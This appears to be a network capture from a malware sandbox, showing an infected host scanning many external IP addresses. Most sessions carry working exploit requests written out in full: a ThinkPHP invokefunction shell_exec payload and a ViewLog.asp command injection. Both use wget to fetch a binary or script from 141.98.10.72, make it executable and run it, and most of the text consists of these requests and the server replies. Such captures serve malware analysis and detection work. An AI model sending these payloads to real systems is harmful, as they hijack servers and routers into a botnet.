                                                        Feb 14, 2024 09:35:34.683959007 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 33 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 33 34 26 23 34 36 3b 31 38 37 34 31 34 66 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;438e2117&#46;1707899734&#46;187414f2</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1132192.168.2.143983295.165.171.20180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.504606962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.733253002 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Data Raw: 32 31 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 20 25 33 43 73 76 67 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 77 69 64 74 68 3d 27 39 36 2e 30 30 30 30 30 30 70 74 27 20 68 65 69 67 68 74 3d 27 39 36 2e 30 30 30 30 30 30 70 74 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 39 36 2e 30 30 30 30 30 30 20 39 36 2e 30 30 30 30 30 30 27 20 70 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 3d 27 78 4d 69 64 59 4d 69 64 20 6d 65 65 74 27 25 33 45 25 33 43 67 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 30 2e 30 30 30 30 30 30 2c 39 36 2e 30 30 30 30 30 30 29 20 73 63 61 6c 65 28 30 2e 31 30 30 30 30 30 2c 2d 30 2e 31 30 30 30 30 30 29 27 25 30 41 66 69 6c 6c 3d 27 25 32 33 30 38 35 35 37 37 27 20 73 74 72 6f 6b 65 3d 27 6e 6f 6e 65 27 25 33 45 25 33 43 70 61 74 68 20 64 3d 27 4d 35 33 35 20 38 36 33 20 63 2d 32 32 20 2d 32 20 2d 31 33 39 20 2d 31 37 20 2d 32 36 30 20 2d 33 34 20 2d 32 32 38 20 2d 33 31 20 2d 32 36 37 20 2d 34 33 20 2d 32 37 32 20 2d 38 35 20 2d 32 25 30 41 2d 31 30 20 32 33 20 2d 31 38 31 20 35 35 20 2d 33 37 39 20 6c 35 37 20 2d 33 36 30 20 34 30 30 20 30 20 34 30 30 20 30 20 32 30 20 34 30 20 63 31 36 20 33 31 20 32 30 20 35 39 20 31 39 20 31 32 35 20 2d 31 20 31 30 30 25 30 41 2d 32 34 20 31 36 35 20 2d 37 33 20 31 39 39 20 2d 34 31 20 32 39 20 2d 34 36 20 35 37 20 2d 32 32 20 31 31 31 20 33 30 20 36 37 20 32 39 20 31 38 38 20 2d 33 20 32 35 36 20 2d 31 33 20 32 38 20 2d 33 37 20 36 30 20 2d 35 33 25 30 41 37 32 20 2d 35 35 20 33 39 20 2d 31 36 39 20 36 32 20 2d 32 36 38 20 35 35 7a 20 6d 2d 31 35 20 2d 33 34 38 20 63 33 30 20 2d 31 36 20 36 30 20 2d 36 31 20 36 30 20 2d 39 30 20 30 20 2d 31 30 20 2d 38 20 2d 33 33 20 2d 31 37 25 30 41 2d 35 32 20 2d 31 36 20 2d 33 34 20 2d 31 36 20 2d 34 31 20 30 20 2d 31 31 36 20 39 20 2d 34 34 20 31 35 20 2d 38 32 20 31 32 20 2d 38 35 20 2d 36 20 2d 37 20 2d 39 32 20 2d 32 31 20 2d 31 33 31 20 2d 32 31 20 6c 2d 33 31 25 30 41 2d 31 20 2d 36 20 38 35 20 63 2d 34 20 37 35 20 2d 38 20 38 39 20 2d 33 31 20 31 31 32 20 2d 32 30 20 32 30 20 2d 32 36 20 33 36 20 2d 32 36 20 37 30 20 30 20 33 38 20 35 20 35 30 20 33 34 20 37 39 20 33 39 20 33 39 20 38 36 25 30 41 34 35 20 31 33 36 20 31 39 7a 27 2f 25 33 45 25 33 43 2f 67 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30
                                                        Data Ascii: 211f<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>400 - Bad Request</title> <link rel="icon" href="data:image/svg+xml, %3Csvg version='1.0' xmlns='http://www.w3.org/2000/svg' width='96.000000pt' height='96.000000pt' viewBox='0 0 96.000000 96.000000' preserveAspectRatio='xMidYMid meet'%3E%3Cg transform='translate(0.000000,96.000000) scale(0.100000,-0.100000)'%0Afill='%23085577' stroke='none'%3E%3Cpath d='M535 863 c-22 -2 -139 -17 -260 -34 -228 -31 -267 -43 -272 -85 -2%0A-10 23 -181 55 -379 l57 -360 400 0 400 0 20 40 c16 31 20 59 19 125 -1 100%0A-24 165 -73 199 -41 29 -46 57 -22 111 30 67 29 188 -3 256 -13 28 -37 60 -53%0A72 -55 39 -169 62 -268 55z m-15 -348 c30 -16 60 -61 60 -90 0 -10 -8 -33 -17%0A-52 -16 -34 -16 -41 0 -116 9 -44 15 -82 12 -85 -6 -7 -92 -21 -131 -21 l-31%0A-1 -6 85 c-4 75 -8 89 -31 112 -20 20 -26 36 -26 70 0 38 5 50 34 79 39 39 86%0A45 136 19z'/%3E%3C/g%3E%3C/svg%3E" type="image/svg+xml"/> <style type="text/css"> body,html{width:100%;height:100%;background-color:#0
                                                        Feb 14, 2024 09:35:34.733325958 CET1286INData Raw: 34 32 61 33 61 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 70
                                                        Data Ascii: 42a3a}body{color:#fff;text-align:center;text-shadow:0 2px 4px rgba(0, 0, 0, 0.5);padding:0;min-height:100%;-webkit-box-shadow:inset 0 0 100px rgba(0, 0, 0, 0.8);box-shadow:inset 0 0 100px rgba(0, 0, 0, 0.8);display:table;font-family:"Open Sans
                                                        Feb 14, 2024 09:35:34.733463049 CET1286INData Raw: 4a 43 44 45 39 35 42 55 41 4c 4d 57 56 6f 38 67 6e 5a 4e 77 4e 65 4e 47 78 4f 37 51 75 32 46 55 43 6f 49 33 34 61 68 66 41 48 55 4b 49 45 66 4a 38 53 77 41 2b 39 70 45 39 69 71 75 45 6b 43 32 58 7a 41 4b 41 76 77 4d 6f 52 4a 51 4a 41 43 30 41 64
                                                        Data Ascii: JCDE95BUALMWVo8gnZNwNeNGxO7Qu2FUCoI34ahfAHUKIEfJ8SwA+9pE9iquEkC2XzAKAvwMoRJQJAC0AdUJI1+sA+zwrsH6b5x4y3N9vjZKpkINSJCEQjLpLGOw8Fddnz85OKdUA7CB6h2a8TQh5FPRgSuk/Ea/DA8DrhJAWJ1OH9b/EZY0QsuG1k1J6A8D1GPJNWL+Xu+266xiTfQirqF9UXhp3A/JAzFF8mVI6NIoDuBdRnp
                                                        Feb 14, 2024 09:35:34.733676910 CET1286INData Raw: 6a 50 2f 51 34 5a 56 4d 69 35 66 46 37 42 69 54 66 63 41 66 44 48 47 4e 6f 52 46 6c 71 75 39 35 62 46 39 6e 4e 64 6a 46 4c 77 79 7a 57 6f 62 68 35 54 4a 71 52 78 6c 51 76 37 49 39 56 6d 30 6a 44 77 30 41 53 39 57 45 6b 6f 72 54 5a 65 4a 6a 65 36
                                                        Data Ascii: jP/Q4ZVMi5fF7BiTfcAfDHGNoRFlqu95bF9nNdjFLwyzWobh5TJqRxlQv7I9Vm0jDw0AS9WEkorTZeJje6ZHoVdVsJ7EkRu5dA15e/rLF+ve3zfYdO/JrIdJwGG2yfrBhnXxRpXRm2WWaeU3oHlKskYjdMIsrYAXIXVh1ib+URMvq5MkDQKg3ufZUUCcCup86xIVEecPFYgLx3e9LG2ZXVSPteJP59ngNdV10ZD/9525/5k1bVh
                                                        Feb 14, 2024 09:35:34.733913898 CET1286INData Raw: 67 48 69 75 53 52 37 62 59 7a 41 4b 6c 39 43 72 69 6c 34 58 55 52 74 79 4c 73 74 69 41 6c 64 4a 51 51 4e 2b 43 30 4c 6a 33 37 43 46 79 77 4f 41 39 75 75 55 7a 53 35 69 58 4e 54 62 4f 34 73 67 42 52 53 4a 70 61 62 34 47 51 61 7a 46 6e 76 72 74 51
                                                        Data Ascii: gHiuSR7bYzAKl9Cril4XURtyLstiAldJQQN+C0Lj37CFywOA9uuUzS5iXNTbO4sgBRSJpab4GQazFnvrtQo5lcgX95DYpJRcnAULIBqX0LeQj2OjGuY72vWIivnm/DKuzu5HRUVuEEJYV2kW6M4hZwVmOICr+bCZ4YkOSHJ17b8qQF8CclJEx6U4YSsIVuZqQ3LSRkcnsZWlm3XXQx92AAAzkpqStSGQFFwtc0NWUJPOeSJlQSj
                                                        Feb 14, 2024 09:35:34.733932018 CET1286INData Raw: 55 4b 6a 70 51 76 63 66 2f 71 37 79 70 58 46 6e 77 78 4d 79 2f 37 32 34 41 74 6a 36 65 47 71 4f 48 68 4c 53 41 74 57 31 72 55 38 58 6f 4c 5a 65 6e 76 54 6c 43 72 7a 42 55 51 70 6b 6f 6d 45 4a 4c 71 4b 32 51 32 4e 61 4e 66 65 2f 63 74 6e 4f 50 37
                                                        Data Ascii: UKjpQvcf/q7ypXFnwxMy/724Atj6eGqOHhLSAtW1rU8XoLZenvTlCrzBUQpkomEJLqK2Q2NaNfe/ctnOP7vvwEAxZkfoFGq4W9HHZ0Sr7ZT6TY0+Q9uArghV+qLh1IkirFxdHKMzS8/BQBU5xfRKNXG3CJFVLzySBQKhSIwSpFkBUKyONWuUARCKZKs4LOWQaHIMipGMiEUZ+aw+tpFFGfm0H5+gKOTY2cfi0N4cfnsBcx+b2Zg
                                                        Feb 14, 2024 09:35:34.733948946 CET1007INData Raw: 6d 6b 4b 4f 54 59 33 52 36 68 34 37 46 55 43 34 73 6f 44 67 7a 35 2b 52 6a 73 4c 2f 4d 76 53 6e 4f 7a 47 46 32 61 6e 71 6b 67 6d 43 57 67 74 39 78 63 58 45 6e 70 67 57 42 57 56 4e 48 4a 7a 33 5a 7a 56 45 45 52 41 56 62 4a 78 51 57 36 32 42 70 37
                                                        Data Ascii: mkKOTY3R6h47FUC4soDgz5+RjsL/MvSnOzGF2anqkgmCWgt9xcXEnpgWBWVNHJz3ZzVEERAVbJxQW62Bp7AAGgpg7nRZmp6ad2AIw2q1h+xqlGmanppNqNhqlH4Y6fnZqGtX5RRydHAea6VEkg1IkE0o/n+TMgFvDYErFUiRsHcsIi6R3iO39XcxOTXvmocigODMXKt5x+dyPMTs1PfC/KdJHKZIJpf3cGp3ZQj73tC3v3pRPn7
                                                        Feb 14, 2024 09:35:34.733963966 CET17INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1133192.168.2.144146095.86.115.9380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.645821095 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1134192.168.2.144355295.86.72.1080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.648339987 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1135192.168.2.145330095.56.22.2080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.679692030 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:34.968251944 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:35:34.968627930 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1136192.168.2.144298095.129.202.21880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:34.687346935 CET199INHTTP/1.0 400 Bad request
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1137192.168.2.144538062.93.124.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.276772976 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.730665922 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:34 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1138192.168.2.144494685.72.131.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.280297995 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.526221037 CET548INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:30 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1139192.168.2.143644494.123.0.1978080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.281739950 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1140192.168.2.145450062.210.46.398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.471502066 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.671993971 CET477INHTTP/1.0 404 Not found
                                                        Date: Wed, 14 Feb 2024 09:35:35 +0100
                                                        Server: Monitorix HTTP Server
                                                        Connection: close
                                                        Content-Type: text/html; charset=UTF-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 46 69 6e 61 6c 2f 2f 45 4e 27 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 26 23 78 32 46 3b 63 67 69 2d 62 69 6e 26 23 78 32 46 3b 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 70 3e 0d 0a 3c 68 72 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 4d 6f 6e 69 74 6f 72 69 78 20 48 54 54 50 20 53 65 72 76 65 72 20 6c 69 73 74 65 6e 69 6e 67 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html '-//W3C//DTD HTML 4.01 Final//EN'><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1>The requested URL &#x2F;cgi-bin&#x2F;ViewLog.asp was not found on this server.<p><hr><address>Monitorix HTTP Server listening at localhost Port 8080</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1141192.168.2.145751862.129.133.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.479281902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.681860924 CET25INHTTP/1.0 204 No content
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1142192.168.2.144434662.109.8.548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:35.508168936 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:35.741265059 CET144INHTTP/1.1 404 Not Found
                                                        date: Wed, 14 Feb 2024 08:35:35 GMT
                                                        server: uvicorn
                                                        content-length: 22
                                                        content-type: application/json


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1143192.168.2.145503862.182.83.598080
                                                        TimestampBytes transferredDirectionData
